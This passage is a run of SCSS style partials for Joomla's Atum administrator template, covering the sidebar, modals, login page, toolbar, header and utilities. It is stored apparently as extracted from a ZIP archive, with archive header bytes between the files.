
  .sidebar-sticky {
    position: sticky;
    top: 0;
  }

  .item {
    position: relative;
    display: flex;
    flex-wrap: wrap;
    list-style-type: none;

    a,
    .menu-dashboard,
    .menu-quicktask {
      color: $white;
      text-decoration: none;

      &:hover {
        color: var(--template-text-light);
        text-decoration: none;
        background-color: var(--template-bg-dark-65);
      }
    }

    > a {
      position: relative;
      display: flex;
      flex-grow: 1;
      align-items: center;
      min-height: 40px;

      [class^="#{$jicon-css-prefix}-"],
      [class*=" #{$jicon-css-prefix}-"],
      [class^="#{$fa-css-prefix}-"],
      [class*=" #{$fa-css-prefix}-"] {
        margin: 0 .85rem;
        transform: scale(1.2);
      }
    }

    &-level-2 > a {
      padding-inline-start: 3rem;
    }

    &-level-3 > a {
      padding-inline-start: 3.75rem;
    }
  }

  @include media-breakpoint-up(sm) {
    flex: 1 0 $sidebar-width;
    max-width: $sidebar-width;
    transition: all .3s ease-in-out;
  }

  @include media-breakpoint-down(sm) {
    &.sidebar-menu {
      top: auto;
    }
  }

  .sidebar-toggle {
    background: var(--template-bg-dark-60);

    a {
      color: $white;
    }

    .sidebar-item-title {
      white-space: nowrap;
    }
  }
}

// Sidebar navigation
.main-nav {
  width: $sidebar-width;
  padding: 0;
  font-size: .95rem;

  @include media-breakpoint-down(sm) {
    width: 100%;
  }

  // All list items
  li {

    .menu-dashboard,
    .menu-quicktask {
      > a {
        display: inline-flex;
        align-items: center;
        justify-content: center;
        width: 40px;
        height: 100%;
      }
    }
  }

  // 2nd level items
  ul {
    width: 100%;
    padding: 0;
    background-color: var(--template-bg-dark-75);
  }

  .divider {
    height: 1px;
    margin: 0 0 0 48px;
    list-style: none;
    background-color: var(--template-bg-dark-60);
  }

  .menuitem-group {
    margin-top: .65rem;
    font-size: .75rem;
    padding-inline-start: 3rem;

    .sidebar-item-title {
      color: var(--template-bg-dark-30);
    }
  }

  // Dropdown indicator
  .has-arrow {
    .sidebar-item-title {
      margin-inline-end: auto;
    }

    &::after {
      display: flex;
      align-items: center;
      justify-content: center;
      width: 2rem;
      font-family: "Font Awesome 5 Free";
      font-weight: 900;

      [dir="ltr"] & {
        content: "\f054";
      }

      [dir="rtl"] & {
        content: "\f053";
      }
    }
  }

  a.mm-active {
    background-color: var(--template-bg-dark-70);
  }

  a.mm-active + .menu-quicktask {
    background-color: var(--template-bg-dark-60);
  }

  .mm-active > .has-arrow::after {
    content: "\f078";
  }

  .mm-collapse {
    display: none;

    &.mm-collapsed,
    &.mm-show {
      display: block;
    }
  }

  .mm-collapsing {
    position: relative;
    height: 0;
    overflow: hidden;
    transition: all .35s ease;
  }

  .badge {
    align-self: center;
    margin: 0 .3rem .25rem;
    background-color: var(--template-bg-dark-60);
  }
}

// Sidebar Closed
.closed {
  .sidebar-wrapper {
    flex: 1 0 $sidebar-width-closed;
    max-width: $sidebar-width-closed;
    overflow: visible;
  }

  .sidebar-item-title,
  .has-arrow::after,
  .menu-dashboard {
    display: none;
  }

  .main-nav,
  .main-nav li {
    max-width: 3rem;
  }

  .main-nav a:hover {
    position: relative;
    max-width: 3rem;
  }

  .main-nav a:hover .sidebar-item-title {
    position: absolute;
    left: 100%;
    display: flex;
    align-items: center;
    height: 100%;
    padding: 0 1rem;
    white-space: nowrap;
    pointer-events: none;
    background-color: var(--template-bg-dark-60);
    border-radius: 0 $border-radius $border-radius 0;
    [dir=rtl] & {
      right: 100%;
      left: unset;
      border-radius: $border-radius 0 0 $border-radius;
    }
  }

  .main-nav > li > ul {
    height: 0;
    padding: 0;
    visibility: hidden;
  }
}

@include media-breakpoint-up(sm) {
  .toggler-burger {
    display: none;
  }
}

// Mobile
@include media-breakpoint-down(sm) {
  #menu-collapse {
    display: none;
    background: var(--template-bg-dark-50);
  }

  .toggler-burger {
    position: fixed;
    right: 0;
    bottom: 0;
    z-index: $zindex-mobile-toggle;
    padding: 10px 15px;

    [dir="rtl"] & {
      right: auto;
      left: 0;
    }

    &:focus {
      box-shadow: none;
    }

    .navbar-toggler-icon::before {
      display: inline-block;
      font: normal normal 900 28px/1 "Font Awesome 5 Free";
      color: var(--toggle-color);
      content: "\f00d";
    }

    &.collapsed {
      .navbar-toggler-icon::before {
        content: "\f0c9";
      }
    }
  }

  .sidebar-menu {
    display: none;

    &.show,
    &.collapsing {
      position: fixed;
      bottom: 55px;
      z-index: $zindex-mobile-menu;
      display: block;
      width: 100%;
      min-height: auto;
      max-height: calc(100vh - 72px);
      overflow-y: auto;
    }
  }
}
PK!���88atum/scss/blocks/_modals.scssnu&1i�// Modals

.modal {

  .btn {
    padding: 0 22px;
    margin-inline-end: .5rem;
    font-size: 1rem;
    line-height: 2.3rem;
    color: var(--template-text-dark);
    background: var(--white);
    border-color: var(--whiteoffset);
    box-shadow: 1px 1px 1px 0 rgba(0, 0, 0, .25);
  }

  .btn-primary:not([href]),
  .btn-success:not([href]),
  .btn-danger:not([href]),
  .btn-secondary:not([href]) {
    color: var(--template-text-dark);
    background: var(--white);
    border: 1px solid var(--template-text-dark);
  }

  .btn-primary:not([href]) {
    &:hover {
      color: var(--white);
      background: var(--primary);
      border-color: var(--primary);
    }
  }

  .btn-secondary:not([href]) {
    &:hover {
      color: var(--white);
      background: var(--secondary);
      border-color: var(--secondary);
    }
  }

  .btn-success:not([href]) {
    &:hover {
      color: var(--white);
      background: var(--success);
      border-color: var(--success);
    }
  }

  .btn-danger:not([href]) {
    &:hover {
      color: var(--white);
      background: var(--danger);
      border-color: var(--danger);
    }
  }

  .btn.btn-danger {
    [class^="#{$jicon-css-prefix}-"],
    [class*=" #{$jicon-css-prefix}-"],
    [class^="#{$fa-css-prefix}-"],
    [class*=" #{$fa-css-prefix}-"],
    span {
      display: inline-block;
      width: 2.375rem;
      height: 100%;
      margin: 0 16px;
      margin-inline-start: -22px;
      line-height: 2.375rem;
      color: hsla(0, 0%, 100%, .9);
      background-color: var(--danger);
    }
  }

  .btn.btn-success {
    [class^="#{$jicon-css-prefix}-"],
    [class*=" #{$jicon-css-prefix}-"],
    [class^="#{$fa-css-prefix}-"],
    [class*=" #{$fa-css-prefix}-"],
    span {
      display: inline-block;
      width: 2.375rem;
      height: 100%;
      margin: 0 16px;
      margin-inline-start: -22px;
      line-height: 2.375rem;
      color: hsla(0, 0%, 100%, .9);
      background-color: var(--success);
    }
  }
}

.modal-header {
  padding: 0 15px;
}

.modal-body {
  overflow-y: initial;
}

.modal-title {
  font-weight: $font-weight-normal;
  line-height: $modal-header-height;
}

.contentpane {
  padding: 20px;
}

// Changelog
.changelog {
  text-align: start !important;

  &__item {
    display: flex;
    border-bottom: 1px solid $table-border-color;

    @include media-breakpoint-down(md) {
      flex-direction: column;
    }
  }

  &__tag {
    flex: 1 0 180px;
    max-width: 180px;
    padding: 10px 15px;
    text-align: end;
    background: darken($gray-100, 2.5%);
    border-right: 1px solid $table-border-color;

    .badge {
      border-radius: .2rem;

      &.badge-jlanguage {
        background-color: $white;
      }
    }

    @include media-breakpoint-down(md) {
      flex: 1 0 auto;
      max-width: 100%;
      text-align: left;
      border-right: 0;
      border-bottom: 1px solid $table-border-color;
    }
  }

  &__list {
    padding: 10px 15px;

    ul {
      padding-inline-start: 15px;
      margin-bottom: 0;
    }

    li {
      margin-bottom: .15rem;

      &:last-of-type {
        margin-bottom: 0;
      }
    }
  }
}
PK!��9���atum/scss/blocks/_global.scssnu&1i�// Global

html {
  height: 100%;

  &.a11y_font {
    font-size: 18px;
  }
}

body {
  display: flex;
  flex-direction: column;
  min-height: 100%;
  padding: 0;
  margin: 0;
  text-align: start;

  &.admin {
    background-color: var(--template-bg-dark-5);
  }

  &.monochrome {
    filter: grayscale(1);
    &::after {
      position: fixed;
      top: 0;
      left: 0;
      z-index: -1;
      width: 100%;
      height: 100%;
      content: "";
      background: var(--template-bg-dark-5);
    }
  }

  &.a11y_contrast {
    filter: contrast(115%);
  }

  &.monochrome.a11y_contrast {
    filter: grayscale(1) contrast(115%);
  }

  &.a11y_highlight {
    a,
    .header-item-content {
      padding: 3px;
      text-decoration: underline !important;
      border: #f00 dotted 1px;
    }

    .joomlaversion {
      padding: 0;
      text-decoration: none !important;
      border: none;
    }

    a.page-link {
      padding: $pagination-padding-y $pagination-padding-x;
    }
  }
}

h1,
h2,
h3,
h4,
h5,
h6 {
  font-weight: $font-weight-bold;
}

h1 {
  font-weight: $font-weight-normal;
}

small,
.small {
  font-size: $font-size-sm;
}

legend {
  font-size: 1.2rem;
  font-weight: $font-weight-bold;
}

// focus-visible polyfill rule
.js-focus-visible :focus:not(.focus-visible) {
  outline: none;
}

// Default focus highlighting
a,
button,
input,
textarea {

  &.focus-visible {
    outline: auto 2px var(--focus);
  }
}

// Break up text in cells to prevent overflow
.break-word {
  word-break: break-all;
  word-wrap: break-word;
}

label,
caption {
  font-size: $label-font-size;
  text-align: start;
}

.logo {

  img path {
    fill: var(--template-text-dark);
  }
}

.container-main,
.system-debug {
  padding-bottom: 50px;
}

body .container-main {
  order: 1;
  position: relative;
  padding-right: 0;
  padding-left: 0;
}

.content {
  padding: 1rem;

  @include media-breakpoint-up(md) {
    padding: 0 2rem;

    .subhead + & {
      padding-top: 0;
    }
  }
}

body:not(.contentpane) .main-card {
  background: $white;
  border-radius: $border-radius;
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
}

.row-selected {
  background-color: var(--toolbar-bg);
}

// Chosen (TEMPORARY)
.chzn-container-single {
  width: auto !important;
}

// Multiple buttons wrapping
.input-group input {
  min-width: 220px;
}

// Multilingual associations specific
.item-associations {
  padding: 0;
}

.item-associations li {
  display: inline-block;
  margin-bottom: 3px;
  list-style: none;
}

// Quickicon specific
.message-alert {
  text-align: end !important;
}

// external links with icons
a[target="_blank"]::before {
  padding-inline-end: 3px;
  font-family: "Font Awesome 5 Free";
  font-size: 14px;
  font-weight: 900;
  content: "\f35d";
}

#wrapper {
  &.d-flex {
    @include media-breakpoint-down(sm) {
      display: block !important;
    }
  }
}

.text-muted {
  color: var(--template-text-dark) !important;
  opacity: .7;
}

.card-columns {
  display: grid;
  grid-gap: 0 15px;
  grid-template-columns: 1fr;

  @include media-breakpoint-up(md) {
    grid-template-columns: 1fr 1fr;
  }
}

.cpanel-help,
.cpanel-system {

  .card-columns {
    @include media-breakpoint-up(md) {
      grid-template-columns: 1fr 1fr 1fr;
    }
  }
}

.tiny {
  font-size: $font-size-vsm;
  line-height: 1.4rem;
}

// details

details {
  padding: .5rem 1rem;
  margin: 0 0 2rem;
  background: var(--template-bg-dark-3);
  border: 1px solid var(--template-bg-dark-10);
  border-radius: $border-radius;

  summary {
    color: var(--template-link-color);

    ~ * {
      margin-top: 1rem;
    }
  }
}

// meter element
meter {
  width: 100%;
}

// Bootstrap 4 b/c
.sr-only {
  @extend .visually-hidden;
}

// tab *+* border
@include media-breakpoint-up(md) {
  joomla-tab[orientation=horizontal]:not([view=accordion]) {
    section > .row {
      --gutter-x: 4rem;

      > * + * {
        border-inline-start: 1px solid var(--template-bg-dark-10);
      }
    }
  }
}
PK!�B=�atum/scss/blocks/_edit.scssnu&1i�// Edit Form

.title-alias {
  .form-control {
    max-width: 100%;
  }

  .form-control-feedback {
    position: absolute;
    right: 1rem;
    bottom: -1.8rem;
    text-align: right;
  }
}

.layout-edit {

  .title-alias {
    .form-group {
      box-shadow: none;
    }
  }
}
PK!qya��"atum/scss/blocks/_sidebar-nav.scssnu&1i�// Sidebar

.sidebar-nav {
  padding: 1rem 2rem;

  li {
    font-size: .9rem;
    font-weight: $font-weight-bold;

    &.divider {
      margin: .3rem 0;
    }

    a {
      display: block;
      padding: .25rem;
      font-weight: $font-weight-normal;
      color: var(--template-text-dark);
      text-decoration: none;

      &::before {
        margin-right: .5rem;
        font-family: "Font Awesome 5 Free";
        font-weight: 900;
        content: "\f054";

        [dir="rtl"] & {
          margin-right: 0;
          content: none;
        }
      }

      &::after {
        [dir="rtl"] & {
          margin-inline-end: .5rem;
          font-family: "Font Awesome 5 Free";
          font-weight: 900;
          content: "\f053";
        }
      }
    }

    &.item:hover, &.active {
      background-color: var(--template-bg-dark-60);

      a {
        color: var(--template-text-light);
      }
    }
  }
}
PK!��!��!atum/scss/blocks/_treeselect.scssnu&1i�// Tree select

.treeselect {
  display: block;
  padding-left: 0;
  list-style: none;

  .nav-header {
    font-weight: $font-weight-bold;
    color: $gray-900;
  }

  li {
    position: relative;
    display: block;
    line-height: $treeselect-line-height;
    list-style: none;

    &::before {
      position: absolute;
      top: 14px;
      left: ($treeselect-indent - 15px);
      width: 10px;
      height: 1px;
      margin: auto;
      content: "";
      background-color: rgba(0, 0, 0, .2);

      [dir=rtl] & {
        right: ($treeselect-indent - 15px);
        left: 0;
        margin: 0;
      }
    }

    &::after {
      position: absolute;
      top: 0;
      bottom: 0;
      left: ($treeselect-indent - 15px);
      width: 1px;
      height: 100%;
      content: "";
      background-color: rgba(0, 0, 0, .2);

      [dir=rtl] & {
        right: ($treeselect-indent - 15px);
        left: 0;
      }
    }

    &:last-child {

      &::after {
        height: 14px;
      }
    }

    li {
      padding-inline-start: $treeselect-indent;
    }
  }

  > li::before,
  > li::after {
    display: none;
  }

  .#{$jicon-css-prefix}-,
  .#{$fa-css-prefix}- {
    display: none;
  }

  .treeselect-toggle {
    display: inline-block;
    padding: 0;
    margin-right: .1rem;
    text-align: center;
    cursor: pointer;
  }

  .treeselect-menu {
    display: inline-block;
  }

  .treeselect-item {
    display: inline-block;

    input {
      position: relative;
      top: 1px;
      margin-right: .2rem;
    }

    label {
      margin-bottom: 0;
    }
  }

  .dropdown-toggle {
    padding: 0 .5rem .3rem;
    margin-left: .5rem;

    &::after {
      margin-left: 0;
      font-size: 1rem;
      color: var(--template-text-dark);
    }
  }
}

.treeselect-sub {
  padding-left: 0;
}

.tree-holder {

  ul ul {

    li::before,
    li::after {
      left: 8px;
      display: block;

      [dir=rtl] & {
        right: 8px;
        left: 0;
        margin: 0;
      }
    }

    li::before {
      top: 12px;
    }

    li:last-child::after {
      height: 12px;
    }
  }

  li {
    line-height: 1.8rem;

    li {
      padding-inline-start: 20px;
    }
  }
}
PK!A	3��atum/scss/blocks/_icons.scssnu&1i�// Icons

.#{$jicon-css-prefix}-white {
  color: $white;
}

.tbody-icon {
  padding: 0 3px;
  text-align: center;
  background-color: transparent;
  border: 0;

  [class^="#{$jicon-css-prefix}-"],
  [class*=" #{$jicon-css-prefix}-"],
  [class^="#{$fa-css-prefix}-"],
  [class*=" #{$fa-css-prefix}-"] {
    width: 26px;
    height: 26px;
    font-size: 1rem;
    line-height: 22px;
    color: $gray-400;
    border: 2px solid var(--border);
    border-radius: 50%;
  }

  .#{$jicon-css-prefix}-publish,
  .#{$jicon-css-prefix}-check,
  .#{$fa-css-prefix}-check {
    color: var(--success);
    border-color: var(--success);
  }

  .#{$jicon-css-prefix}-home,
  .#{$jicon-css-prefix}-color-featured,
  .#{$jicon-css-prefix}-star.featured,
  .#{$fa-css-prefix}-star.featured {
    color: $warning;
    border-color: $warning;
  }

  .#{$jicon-css-prefix}-archive,
  .#{$jicon-css-prefix}-folder,
  .#{$fa-css-prefix}-folder {
    color: var(--template-text-dark);
    border-color: $gray-700;
  }

  .#{$jicon-css-prefix}-checkedout,
  .#{$jicon-css-prefix}-lock,
  .#{$fa-css-prefix}-lock {
    width: auto;
    height: auto;
    font-size: 1.2rem;
    line-height: 1rem;
    color: var(--template-text-dark);
    border: 0;
  }

  &.home-disabled,
  &.featured-disabled,
  &.color-featured-disabled,
  &.#{$jicon-css-prefix}-star-disabled,
  &.#{$fa-css-prefix}-star-disabled {
    cursor: not-allowed;
    opacity: 1;
  }

  &.disabled .#{$jicon-css-prefix}-home,
  &.disabled .#{$fa-css-prefix}-home {
    color: $state-warning-bg;
    border-color: $state-warning-bg;
  }
}

// WebAuthn
.plg_system_webauthn_login_button svg {
  margin-inline-end: 2px;
}

.plg_system_webauthn_login_button svg path {
  fill: var(--white);
}

.badge > span {
  margin-inline-end: .5rem;
}
PK!�$QQatum/scss/blocks/_layout.scssnu&1i�.options-form {
  width: 100%;
  padding: 1vw 2vw;
  margin-bottom: 1rem;
  color: var(--template-text-dark);
  border: 1px solid var(--template-bg-dark-20);

  > legend {
    float: none;
    width: auto;
    padding: 0 1rem;
    font-weight: $font-weight-bold;
    color: var(--template-text-dark);
    background-color: $white;
  }
}
PK!�ȳp��atum/scss/blocks/_login.scssnu&1i�// Login page

.view-login,
.task-logout {

  .container-main {
    order: 1;

    @include media-breakpoint-down(md) {
      display: flex;
      flex-wrap: wrap;
      align-items: center;
      justify-content: center;
      min-height: calc(100vh - 35vh);
    }

    #content {
      @include media-breakpoint-down(md) {
        max-width: 98%;
        padding: 0;
      }
    }
  }

  .login {
    width: 100%;
    max-width: 25rem;
    padding: 30px;
    margin: 1rem;
    color: var(--template-text-dark);
    background: var(--white);
    border-radius: 10px;
    box-shadow: 0 4px 20px -10px var(--template-bg-dark-50);

    @include media-breakpoint-down(lg) {
      margin-bottom: 3rem;
    }

    img {
      max-height: 4.4rem;
    }

    .logo {
      padding: 0 20px 20px;
    }

    svg.joomla-logo {
      width: 2.4rem;
      height: 4.4rem;
      background-size: 4.4rem 2.4rem;

      path {
        fill: var(--template-bg-dark);
      }
    }

    &-watermark {
      position: absolute;
      z-index: -1;
      max-width: 500px;
      transform: rotate(12deg) translate(40%, 10%);
    }

  }

  .form-group {
    position: relative;
    margin-bottom: 1.85rem;

    label {
      span {
        font-size: ($font-size-base * .9);

        @include media-breakpoint-down(sm) {
          width: 100%;
        }

        &.text-end {
          font-size: ($font-size-base * .75);
          color: var(--template-special-color);
        }
      }
    }

    .form-control-feedback {
      position: absolute;
      right: 0;
      bottom: -1.5rem;
      font-size: ($font-size-base * .75);
      text-align: right;

      [dir=rtl] & {
        right: auto;
        left: 0;
        text-align: left;
      }
    }

    .form-control-hint {
      position: absolute;
      top: .1rem;
      right: 0;
      font-size: ($font-size-base * .75);
      text-align: right;

      [dir=rtl] & {
        right: auto;
        left: 0;
        text-align: left;
      }
    }
  }

  input:focus,
  select:focus {
    background: $white;
    box-shadow: inset 0 0 1px 1px var(--template-contrast);
  }

  h1 {
    margin-bottom: .25rem;
    color: $white;
    text-align: center;
  }

  h2 {
    font-weight: $font-weight-normal;
    color: var(--template-bg-dark-10);
  }

  .btn {
    @include media-breakpoint-only(xs) {
      padding: 8px 10px;
      font-size: ($font-size-base * .875);
    }
  }

  .form-control,
  .form-select {
    max-width: none;
  }

  .sidebar-wrapper,
  .header .logo {
    flex: 1 0 400px;
  }

  .sidebar-wrapper {
    display: flex;
    flex-direction: column;
    max-width: none;
    background-color: var(--template-sidebar-bg);

    @include media-breakpoint-down(md) {
      order: 2;
      margin-bottom: 3rem;
    }

    .main-brand {
      margin-bottom: auto;

      a {
        font-size: ($font-size-base * .875);
      }
    }

    .card-header {
      font-size: ($font-size-base * 1.125);
      color: $white;
    }
  }

  #sidebar {
    align-self: flex-end;
    width: 100%;
    font-size: ($font-size-base * .875);
    color: var(--template-text-light);
    text-align: center;

    .card {
      background: rgba(0, 0, 0, .1);
      box-shadow: none;

      .module-body {
        padding: .75rem 1.25rem;
      }
    }

    @include media-breakpoint-down(md) {
      position: relative;
      bottom: 0;
    }
  }

  .container-main,
  .sidebar-wrapper {

    @include media-breakpoint-down(md) {
      flex: 1 0 100% !important;
      max-width: 100% !important;
      min-height: auto;
    }
  }

  .wrapper {
    display: flex;

    @include media-breakpoint-down(md) {
      flex-direction: column;
    }
  }

  .header {
    display: flex;

    .logo {
      &.small {
        line-height: 2.5rem;
      }
    }

    @include media-breakpoint-down(md) {
      background: var(--template-bg-dark-70);
    }
  }
}

label {
  color: $darkblue;
}

.com_login .sidebar-wrapper .main-brand {
  flex: 1;
  flex-basis: auto;
  margin-top: 100px;
  text-align: center;

  @include media-breakpoint-down(md) {
    margin-top: 10px;
  }
}

.com_login .sidebar-wrapper #sidebar p {
  margin-bottom: .2rem;
}

.com_login .sidebar-wrapper .main-brand a,
.com_login .sidebar-wrapper #sidebar,
.com_login .sidebar-wrapper #sidebar a {
  color: var(--template-text-light);
}

.view-login {
  #wrapper.d-flex {
    @include media-breakpoint-down(md) {
      display: flex !important;
    }
  }

  #sidebar-wrapper:not(.show):not(.collapse) {
    @include media-breakpoint-down(md) {
      display: block;
    }
  }

  .invalid .form-control-feedback {
    color: var(--danger);
  }
}

// Detect IE 10+ and display alert
.ie11 {
  display: none;
}

@media all and (-ms-high-contrast: none),
  (-ms-high-contrast: active) {
  .ie11 {
    display: block;
  }
}

.login_message {
  margin: 1rem 1rem 0;
}
PK!U����atum/scss/blocks/_alerts.scssnu&1i�// Alerts

.alert {
  margin: 1rem 0;
  border-right: 0;
  border-left: 0;
  border-radius: $border-radius-sm;

  &.alert-info {
    color: var(--template-bg-dark);
    background-color: var(--template-bg-dark-10);
    border: 1px solid var(--template-bg-dark-20);
  }

  &.alert-warning {
    color: $state-warning-text;
    background-color: $state-warning-bg;
    border: 1px solid $state-warning-border;
  }

  &.alert-success {
    color: $state-success-text;
    background-color: $state-success-bg;
    border: 1px solid $state-success-border;
  }

  &.alert-error {
    color: $state-error-text;
    background-color: $state-error-bg;
    border: 1px solid $state-error-border;
  }
}

.alert-parent {
  margin-top: 0;
}

fieldset .alert {
  &.alert-info {
    margin: -1rem 0 1rem;
  }
}

.alert-heading {
  font-size: $h4-font-size;
}

@keyframes fadeIn {
  from {
    opacity: 0;
    transform: translateY(-15px);
  }

  to {
    opacity: 1;
    transform: translateY(0);
  }
}
PK!�nj?atum/scss/blocks/_toolbar.scssnu&1i�.subhead {
  position: sticky;
  top: 0;
  right: 0;
  left: 0;
  z-index: $zindex-toolbar;
  width: auto;
  min-height: 43px;
  padding: 8px 1rem;
  color: var(--template-text-dark); //#0c192e;
  background: $white;
  background-image: linear-gradient(var(--toolbar-bg), var(--template-bg-dark-3));
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);

  .row {
    margin-right: 0;
    margin-left: 0;
  }

  &.noshadow {
    box-shadow: none;
  }

  joomla-toolbar-button,
  .btn-group {
    margin-inline-start: .75rem;

    &:first-child {
      margin-inline-start: 0;
    }
  }

  joomla-toolbar-button {
    .btn > span,
    .dropdown-item > span {
      margin-inline-end: .5rem;
      width: 1.25em;
      text-align: center;
    }
  }

  .btn {
    --subhead-btn-accent: var(--template-text-dark);
    padding: 0 1rem;
    margin: 5px 0;
    font-size: 1rem;
    line-height: $atum-toolbar-line-height;
    color: var(--template-text-dark);
    background: $white;
    border-color: hsl(var(--hue),20%,80%);

    > span {
      display: inline-block;
      color: var(--subhead-btn-accent);
    }

    &:not([disabled]):hover,
    &:not([disabled]):active,
    &:not([disabled]):focus {
      color: rgba(255, 255, 255, .9);
      background-color: var(--subhead-btn-accent);
      border-color: var(--subhead-btn-accent);

      > span {
        color: rgba(255, 255, 255, .9);
      }
    }

    &.btn-success {
      --subhead-btn-accent: var(--success);
    }

    &.btn-danger {
      --subhead-btn-accent: var(--danger);
    }

    &.btn-primary {
      --subhead-btn-accent: var(--template-link-color);
    }

    &.btn-secondary {
      --subhead-btn-accent: var(--template-special-color);
    }

    &.btn-info {
      --subhead-btn-accent: var(--template-bg-dark);
    }

    &.btn-action {
      --subhead-btn-accent: var(--template-bg-dark);
      display: flex;
      align-items: center;

      &::after {
        width: 2.375rem;
        font-family: "Font Awesome 5 Free";
        font-weight: 900;
        content: "\f078";
        border: 0;
      }
    }

    &[disabled],
    &.dropdown-toggle[disabled] {
      --subhead-btn-accent: var(--template-bg-dark);
      background: rgba($gray-300, .8);
      opacity: .5;

      &:hover,
      &:active,
      &:focus {
        cursor: not-allowed;
      }
    }
  }

  .dropdown-toggle {
    &.btn {
      padding-inline-end: 0;
    }
  }

  .btn-group:not(:last-child) > .dropdown-toggle-split {
    order: 1;
    margin-inline-start: -$border-radius;

    [dir="ltr"] & {
      border-radius: 0 $border-radius $border-radius 0;
    }

    [dir="rtl"] & {
      border-radius: $border-radius 0 0 $border-radius;
    }
  }

  .dropdown-menu joomla-toolbar-button,
  .btn-group joomla-toolbar-button {
    margin-inline-start: 0;
  }

  .contentpane & {
    margin: -15px -15px 0;
    background-image: none;
    border-bottom: 1px solid var(--template-bg-dark-7);
  }
}

@include media-breakpoint-down(sm) {
  joomla-tab[view=accordion] .col-md-9,
  joomla-tab[view=accordion] .col-md-3 {
    padding: .5rem 1rem !important;
  }

  #myTab {
    margin-top: 1rem;
    margin-bottom: 1.5rem;
  }

  joomla-tab[view=accordion] ul li {
    width: 100%;
  }

  .toggler-toolbar {
    top: 0;
    bottom: auto;
    z-index: $zindex-alerts;
    padding: 7px 10px;
    margin: 5px;
    background-color: var(--template-bg-dark);
    border-radius: 30px;

    .toggler-toolbar-icon::before {
      font: normal normal 900 28px/1 "Font Awesome 5 Free";
      color: var(--toggle-color);
      content: "\f00d";
    }

    &.collapsed .toggler-toolbar-icon::before {
      content: "\f085";
    }
  }

  .subhead {
    padding-right: 0;
    padding-left: 0;

    joomla-toolbar-button,
    .btn-group,
    .btn {
      width: 100%;
      margin-left: 0;
      text-align: left;
    }

    .btn-toolbar > .btn-group,
    .btn-toolbar > joomla-toolbar-button {
      margin-left: 0;
    }

    .btn.btn-action::after {
      text-align: center;
      margin-inline-start: auto;
    }

    .dropdown-toggle-split {
      width: auto;
    }
  }
}
PK!�2���atum/scss/blocks/_header.scssnu&1i�// Header
.header {
  z-index: $zindex-header;
  color: $white;
  background: var(--template-bg-dark);

  &-inside {
    display: flex;
    min-height: 54px;
  }

  a {
    color: $white;

    &:before {
      display: none;
    }
  }

  .logo {
    display: flex;
    flex-flow: row nowrap;
    align-items: center;
    width: $sidebar-width;
    height: 100%;
    padding: 12px 5px;
    overflow: hidden;
    background-color: var(--template-bg-dark-70);
    transition: all .3s ease-in-out;

    &.small {
      width: $sidebar-width-closed;
      transition: all .3s ease-in-out;

      svg,
      img {

        &:not(.logo-collapsed) {
          display: none;
        }

        &.logo-collapsed {
          display: inline-block;
          width: 20px;
          height: 20px;
          object-fit: contain;
          object-position: center center;
        }
      }
    }

    svg,
    img {
      width: 150px;
      height: 30px;
      margin: 0 .35rem;
      object-fit: contain;
      object-position: left center;

      [dir=rtl] & {
        object-position: right center;
      }

      &.logo-collapsed {
        display: none;
      }
    }
  }

  .page-title {
    padding: 0 1rem;
    margin: 0;
    overflow: hidden;
    font-size: 1.2rem;
    color: $white;
    text-overflow: ellipsis;
    white-space: nowrap;

    > span {
      margin-inline-end: .25rem;
    }
  }

  .dropdown-menu {
    font-size: .85rem;
  }

  .dropdown-header,
  .dropdown-item {
    padding: .82rem .75rem;
    color: $white;
    background-color: var(--template-bg-dark-70);

    > span {
      margin-inline-end: .5rem;
    }

    &:hover {
      background-color: var(--template-bg-dark);
    }
  }

  .dropdown-header {
    padding: .75rem;
    font-size: inherit;
    background-color: var(--template-bg-dark);
  }
}

.header-items {
  align-items: center;
  justify-content: flex-end;
  width: 50%;
  margin: 15px;
  margin-inline-start: auto;

  .dropdown-toggle {
    background-color: transparent;
    border: 0;

    &::after {
      display: none;
    }
  }
}

.header-item {
  position: relative;
  margin: 0 4px;
}

.header-item-content {
  display: flex;
  align-items: center;
  line-height: 1rem;
  color: $white;
  background-color: var(--template-bg-dark-60);
  border-radius: 22px;
  padding-inline-end: 4px;

  a,
  button {
    color: $white;
    text-decoration: none;
  }

  a {
    display: flex;
  }

  &:not(.no-link):not(.joomlaversion):hover {
    background-color: var(--template-bg-dark-50);
  }

  &.joomlaversion {
    color: var(--bluegray);
    background-color: transparent;

    .header-item-text {
      padding-inline-end: 12px;
    }
  }
}

.header-item-icon {
  > * {
    display: flex;
    align-items: center;
    justify-content: center;
    width: 28px;
    min-width: 28px;
    height: 28px;
    margin: 4px;
    color: $white;
    background-color: var(--template-bg-dark);
    border-radius: 16px;
  }

  span {
    margin: 4px;
  }
}

.header-item-count {
  margin-inline-end: .5rem;;
}

.header-item-text {
  padding: 0 8px 0 4px;
  font-size: .75rem;
  white-space: nowrap;
}

.header-more-btn {
  margin: 0 5px;
  font-size: 1.7rem;
}

.header-dd-items {
  .header-item-content {
    background: transparent;
  }

  .header-item-text {
    font-size: .75rem;
  }

  .dropdown-item {
    padding: .5rem .75rem;
  }
}

.header-dd-item {
  padding: 3px 6px;
}

@include media-breakpoint-down(md) {
  .header-items {
    position: fixed;
    bottom: 0;
    flex-direction: row-reverse;
    width: 100%;
    padding: 10px 0;
    margin: 0;
    background: var(--template-bg-dark);

    .#{$jicon-css-prefix}-angle-down,
    .#{$fa-css-prefix}-angle-down {
      transform: rotate(180deg);
    }
  }

  .header-item-more {
    &.active .header-more-menu {
      left: 0;

      [dir=rtl] & {
        right: 0;
        left: auto;
      }
    }

    .header-item-content {
      background: transparent;
    }
  }

  .header-more-menu {
    top: auto;
    bottom: 100%;
  }
}
PK!Þ
	
	 atum/scss/blocks/_utilities.scssnu&1i�// Utilities
* {
  box-sizing: border-box;
}

// Keep B/C
.element-invisible {
  position: absolute;
  width: 1px;
  height: 1px;
  padding: 0;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  white-space: nowrap;
  border: 0;
  clip-path: inset(50%);
}

.hidden {
  display: none;
}

.table-row {
  display: table-row;
}

// Form Grid

.form-grid {
  --span-1: span 1;
  --span-2: span 1;
  --span-3: span 1;
  --span-4: span 1;
  --span-5: span 1;

  display: grid;
  grid-template-columns: repeat(1, 1fr);
  grid-gap: 1rem;

  @include media-breakpoint-up(sm) {
    --span-2: span 2;
    --span-3: span 2;
    --span-4: span 2;
    --span-5: span 2;

    grid-template-columns: repeat(2, 1fr);
  }

  @include media-breakpoint-up(md) {
    --span-3: span 3;
    --span-4: span 4;
    --span-5: span 4;

    grid-template-columns: repeat(4, 1fr);
